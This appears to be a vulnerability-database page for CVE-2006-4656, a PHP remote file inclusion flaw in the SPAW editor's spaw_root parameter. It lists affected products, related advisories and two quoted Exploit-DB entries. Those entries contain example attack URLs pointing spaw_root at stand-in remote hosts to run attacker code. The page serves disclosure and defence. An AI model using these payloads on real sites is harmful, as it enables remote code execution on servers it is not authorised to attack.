CVE-2006-4656
published 2006-09-09CVE-2006-4656: PHP remote file inclusion vulnerability in admin/editeur/spaw_control.class.php in Web Provence SL_Site 1.0 and earlier allows remote attackers to execute…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
10.59%
95.2th percentile
PHP remote file inclusion vulnerability in admin/editeur/spaw_control.class.php in Web Provence SL_Site 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: CVE analysis suggests that this issue is actually in a third party product, SPAW Editor PHP Edition.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alex | downloadengine | — | — |
| web-provence | sl_site | <= 1.0 | — |
| xoops | cjay_content_module | — | — |
| xoops | icontent_module | — | — |
| xoops | tinycontent_module | — | — |
| xoops | wiwimod_module | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-5h7c-ghqw-hhxv: PHP remote file inclusion vulnerability in admin/editeur/spaw_control
ghsa_unreviewed·2022-05-01
CVE-2006-4656 [HIGH] GHSA-5h7c-ghqw-hhxv: PHP remote file inclusion vulnerability in admin/editeur/spaw_control
PHP remote file inclusion vulnerability in admin/editeur/spaw_control.class.php in Web Provence SL_Site 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: CVE analysis suggests that this issue is actually in a third party product, SPAW Editor PHP Edition.
GHSA
GHSA-2p7h-c2c4-7p56: PHP remote file inclusion vulnerability in admin/editor2/spaw_control
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3220 [HIGH] GHSA-2p7h-c2c4-7p56: PHP remote file inclusion vulnerability in admin/editor2/spaw_control
PHP remote file inclusion vulnerability in admin/editor2/spaw_control.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this may be a duplicate of CVE-2006-4656.
GHSA
GHSA-cg2v-qgrr-gw86: PHP remote file inclusion vulnerability in admin/includes/spaw/spaw_control
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-5291 [HIGH] CWE-94 GHSA-cg2v-qgrr-gw86: PHP remote file inclusion vulnerability in admin/includes/spaw/spaw_control
PHP remote file inclusion vulnerability in admin/includes/spaw/spaw_control.class.php in Download-Engine 1.4.2 allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: CVE analysis suggests that this issue is actually in a third party product, SPAW Editor PHP Edition, so this issue is probably a duplicate of CVE-2006-4656.
GHSA
GHSA-vwmx-6456-487h: PHP remote file inclusion vulnerability in admin/spaw/spaw_control
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3237 [HIGH] GHSA-vwmx-6456-487h: PHP remote file inclusion vulnerability in admin/spaw/spaw_control
PHP remote file inclusion vulnerability in admin/spaw/spaw_control.class.php in the TinyContent 1.5 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.
GHSA
GHSA-46cj-j92w-jf4m: PHP remote file inclusion vulnerability in include/wysiwyg/spaw_control
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3057 [HIGH] GHSA-46cj-j92w-jf4m: PHP remote file inclusion vulnerability in include/wysiwyg/spaw_control
PHP remote file inclusion vulnerability in include/wysiwyg/spaw_control.class.php in the icontent 4.5 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.
GHSA
GHSA-xrj9-vwwj-2w2c: PHP remote file inclusion vulnerability in admin/spaw/spaw_control
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3221 [HIGH] GHSA-xrj9-vwwj-2w2c: PHP remote file inclusion vulnerability in admin/spaw/spaw_control
PHP remote file inclusion vulnerability in admin/spaw/spaw_control.class.php in the XT-Conteudo module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.
GHSA
GHSA-vvqg-75f9-88hx: PHP remote file inclusion vulnerability in spaw/spaw_control
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3289 [HIGH] GHSA-vvqg-75f9-88hx: PHP remote file inclusion vulnerability in spaw/spaw_control
PHP remote file inclusion vulnerability in spaw/spaw_control.class.php in the WiwiMod 0.4 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.
No detection rules found.
Exploit-DB
Download-Engine 1.4.2 - 'spaw' Remote File Inclusion
exploitdb·2006-10-12
CVE-2006-5291 Download-Engine 1.4.2 - 'spaw' Remote File Inclusion
Download-Engine 1.4.2 - 'spaw' Remote File Inclusion
---
#======================================================================================#
# Download-Engine Remote File Include #
#======================================================================================#
# Info:- #
# #
# Scripts: Download-Engine #
# Download: http://www.alexscriptengine.de/v2/dl_engine/redirect.php?dlid=50&ENGINEsessID=4754ee8243de5f333ec74272f249b649
# Version : 1.4.2 #
# Dork & vuln : download scripts and think :) #
# Note : only this version effcted :) #
#======================================================================================#
#Exploit : #
# #
#http://localhost/path/admin/includes/spaw/spaw_control.class.php?spaw_root=http://EvElCoDe.txt?
# #
#========================================
Exploit-DB
SL_Site 1.0 - 'spaw_root' Remote File Inclusion
exploitdb·2006-09-07
CVE-2006-5291 SL_Site 1.0 - 'spaw_root' Remote File Inclusion
SL_Site 1.0 - 'spaw_root' Remote File Inclusion
---
SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : SL_Site
version : 1.0
URL : ftp://ftp1.comscripts.com/PHP/2032_slsite-10.zip
Exploit:
~~~~~
Variable $spaw_root not sanitized.When register_globals=on an attacker ca
n exploit this vulnerability with a simple php injection script.
# http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]
Solution :
~~~~~~~
declare variabel $spaw_root
Shoutz:
~~~
# Special greetz to my good friend [Oo]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
*/
Conta
No writeups or analysis indexed.
http://securityreason.com/securityalert/1522http://securitytracker.com/id?1016814http://spaw.cvs.sourceforge.net/spaw/spaw/docs/ChangeLog.txt?view=markuphttp://spaw.cvs.sourceforge.net/spaw/spaw/spaw_control.class.php?r1=1.19&r2=1.20http://spaw.cvs.sourceforge.net/spaw/spaw/spaw_control.class.php?r1=1.25&r2=1.26http://www.securityfocus.com/archive/1/445520/100/0/threadedhttp://www.securityfocus.com/bid/19892https://exchange.xforce.ibmcloud.com/vulnerabilities/28783https://www.exploit-db.com/exploits/2317http://securityreason.com/securityalert/1522http://securitytracker.com/id?1016814http://spaw.cvs.sourceforge.net/spaw/spaw/docs/ChangeLog.txt?view=markuphttp://spaw.cvs.sourceforge.net/spaw/spaw/spaw_control.class.php?r1=1.19&r2=1.20http://spaw.cvs.sourceforge.net/spaw/spaw/spaw_control.class.php?r1=1.25&r2=1.26http://www.securityfocus.com/archive/1/445520/100/0/threadedhttp://www.securityfocus.com/bid/19892https://exchange.xforce.ibmcloud.com/vulnerabilities/28783https://www.exploit-db.com/exploits/2317
2006-09-09
Published